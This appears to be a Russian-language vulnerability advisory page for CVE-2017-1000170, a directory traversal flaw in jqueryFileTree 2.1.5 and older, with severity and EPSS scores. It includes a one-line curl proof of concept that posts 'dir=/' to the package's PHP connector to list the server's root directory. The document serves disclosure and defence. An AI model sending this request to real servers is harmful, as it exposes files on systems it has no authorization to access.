exploitDog

GHSA-p739-9479-5wr2

Опубликовано: 13 мая 2022

Источник: github

Github: Прошло ревью

CVSS3: 7.5

Описание

jqueryFileTree vulnerable to Directory Traversal

jqueryFileTree 2.1.5 and older is vulnerable to Directory Traversal

POC:

curl 'http://localhost:8000/js/jqueryfiletree-2.1.5/dist/connectors/jqueryFileTree.php' -H 'Referer: xxx' -d "dir=/"

Ссылки

Пакеты

Наименование

jqueryfiletree

npm

Затронутые версииВерсия исправления

<= 2.1.5

Отсутствует

EPSS

Процентиль: 100%

0.90442

Критический

7.5 High

CVSS3

CVE ID

CVE-2017-1000170

Дефекты

CWE-22

Связанные уязвимости

CVE-2017-1000170

CVSS3: 7.5

nvd

около 8 лет назад

jqueryFileTree 2.1.5 and older Directory Traversal

EPSS

Процентиль: 100%

0.90442

Критический

7.5 High

CVSS3

CVE ID

CVE-2017-1000170

Дефекты

CWE-22